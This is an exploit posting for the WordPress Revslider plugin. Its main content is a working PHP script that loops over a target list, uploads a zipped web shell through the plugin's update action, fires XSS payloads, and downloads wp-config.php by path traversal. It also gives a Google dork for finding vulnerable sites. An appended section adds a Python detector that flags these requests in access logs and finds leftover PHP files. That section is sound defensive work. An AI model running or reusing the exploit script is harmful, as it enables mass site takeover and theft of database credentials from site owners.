
WordPress Revslider Arbitrary File Upload / Download / XSS

Posted Jun 23, 2015
Authored by CaFc Versace

WordPress Revslider plugin suffers from cross site scripting and remote shell upload vulnerabilities.

tags | exploit, remote, shell, vulnerability, xss
SHA-256 | 36a172246b28821efbbddd74fa15559539df7db7fe943afe36e9ba491cdc5324

#####################################################################################
# Exploit Title : WordPress Revslider Arbitrary File Upload, Download & Cross Site Scripting
# Google Dork : inurl:"/wp-content/plugins/revslider/"
# Date : 21-06-2015
# Exploit Author : CaFc Versace
# Vendor Homepage : http://revolution.themepunch.com/
# Tested on : Windows 7
# Contact : cafc.versace[@]surabayablackhat.org; me[@]dwisiswanto.my.id
#####################################################################################


# Exploit & PoC :
-------------------------------------------------------------------------------------
<?php
/** me@dwisiswanto.my.id **/

/******************************************
First, install PHP CLI
USAGE: php exploit.php list-of-target.txt
******************************************/

$cafc = array(
"file"=>"revslider.zip", // enter a ur shell file into a zip
"xss"=>"<marquee>CaFc Versace was Here", // for xss
"kfg"=>"..\wp-config.php" // for download config
);

function hajar($yuerel, $dataAing=null) {
$cuih = curl_init();
curl_setopt($cuih, CURLOPT_URL, $yuerel);
if ($dataAing != null){
curl_setopt($cuih, CURLOPT_POST, true);
curl_setopt($cuih, CURLOPT_POSTFIELDS, $dataAing);
}
curl_setopt($cuih, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($cuih, CURLOPT_RETURNTRANSFER, true);
curl_setopt($cuih, CURLOPT_SSL_VERIFYPEER, false);
$eks = curl_exec($cuih);
curl_close($cuih);
return $eks;
}

$site = @file_get_contents($argv[1]);
$tumbal = explode("\r\n", $site);
echo "Calculate the target list : " . count($tumbal);
if (!isset($site)) {
echo "Site N/A.";
} else {
foreach ($tumbal as $uri) {
echo "\n------------------------------------";
echo "\nTarget => " . $uri;
echo "\n";
$menta = hajar($uri . "/wp-admin/admin-ajax.php", array(
"action" => "revslider_ajax_action",
"client_action" => "update_plugin",
"update_file" => $cafc['file'])
);
$jason = json_decode($menta, true);
if ($jason['success'] == false || $jason['message'] == "Wrong request") {
echo "\nExploit [update_plugin] => NOT VULNERABLE";
} else {
echo "\nExploit [update_plugin] => SUCCESS";
echo "\n[+] " . $uri . "/wp-content/plugins/revslider/temp/update_extract/revslider/YOUR_FILE.php\n";
}

$menta2 = hajar($uri . "/wp-admin/admin-ajax.php", array(
"action" => "revslider_ajax_action",
"client_action" => "get_captions_css",
"data" => $cafc['xss'])
);
$jasonB = json_decode($menta2, true);
if ($jasonB['success'] == false || $jason['message'] == "Wrong request") {
echo "\nExploit [get_captions_css] => NOT VULNERABLE";
} elseif ($jasonB['success'] == true) {
echo "\nExploit [get_captions_css] => SUCCESS";
echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
echo "action=revslider_ajax_action&";
echo "client_action=get_captions_css";
echo "data=" . urlencode($cafc['xss']) . "\n";
}

$menta3 = hajar($uri . "/wp-admin/admin-ajax.php", array(
"action" => "revslider_ajax_action",
"client_action" => $cafc['xss'])
);
$jasonC = json_decode($menta3, true);
if (preg_match("/wrong ajax action/i", $jasonC['message'])) {
echo "\nExploit [xss] => SUCCESS";
echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
echo "action=revslider_ajax_action";
echo "client_action=" . urlencode($cafc['xss']) . "\n";
} else {
echo "\nExploit [xss] => NOT VULNERABLE";
}

$menta4 = hajar($uri . "/wp-admin/admin-ajax.php", array(
"action" => "revslider_show_image",
"img" => $cafc['kfg']),
$uri);
if ($menta4 == "empty image" || $menta4 == "image file not found" || $menta4 == 0) {
echo "\nExploit [wp-config] => NOT VULNERABLE\n";
} else {
echo "\nExploit [wp-config] => SUCCESS";
echo "\n[+] " . $uri . "/wp-admin/admin-ajax.php?";
echo "action=revslider_show_image";
echo "img=" . $cafc['kfg'] . "\n";
}
}
}
?>
-------------------------------------------------------------------------------------


# Credits :
-------------------------------------------------------------------------------------
CaFc Versace
Thanks : Agency CaFc - Surabaya BlackHat
-------------------------------------------------------------------------------------
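
# Detection (added example) :
The following is an added example, not part of the original advisory or the plugin's code: it flags the admin-ajax.php request shapes the PoC prints (revslider_show_image with a traversal or .php target, revslider_ajax_action with the named client actions or markup) and lists PHP files left under the extraction path the PoC reports. The log lines, function names and combined-log format are assumptions constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Jun/2015:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=..%5Cwp-config.php HTTP/1.1" 200 3120
203.0.113.7 - - [21/Jun/2015:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=%3Cmarquee%3Etest HTTP/1.1" 200 88
198.51.100.9 - - [21/Jun/2015:10:00:05 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=uploads/2015/06/banner.jpg HTTP/1.1" 200 51200
198.51.100.9 - - [21/Jun/2015:10:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 12
"""

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
KNOWN_CLIENT_ACTIONS = {"update_plugin", "get_captions_css"}  # named in the PoC

def classify(line):
    """Return a finding label for one log line, or None if it looks benign."""
    m = REQUEST.search(line)
    url = urlsplit(m.group(1)) if m else None
    if not url or not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    q = {k: v[0] for k, v in parse_qs(url.query).items()}  # parse_qs URL-decodes
    action = q.get("action", "")
    if action == "revslider_show_image":
        # Normalise Windows separators so "..\" and "../" are treated alike.
        img = q.get("img", "").replace("\\", "/").lower()
        if ".." in img.split("/") or img.endswith(".php"):
            return "file-download"
    if action == "revslider_ajax_action":
        client = q.get("client_action", "")
        if client in KNOWN_CLIENT_ACTIONS:
            return "client-action:" + client
        if re.search(r"[<>\"']", client):
            return "xss-probe"
    return None

def scan_log(text):
    """Return (line_number, label) for every flagged line."""
    return [(n, label) for n, line in enumerate(text.splitlines(), 1)
            if (label := classify(line))]

def extracted_php(wp_root):
    """PHP files left in the extraction directory the PoC reports on success."""
    base = Path(wp_root) / "wp-content/plugins/revslider/temp/update_extract"
    return sorted(str(p.relative_to(base)) for p in base.rglob("*.php")) if base.is_dir() else []

if __name__ == "__main__":
    for n, label in scan_log(SAMPLE_LOG):
        print(f"line {n}: {label}")
```

The PoC sends its probes as POST requests, whose bodies a standard access log does not record, so the log check only sees the GET form of these URLs; the filesystem check covers the upload case independently of logging.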


./learn to be better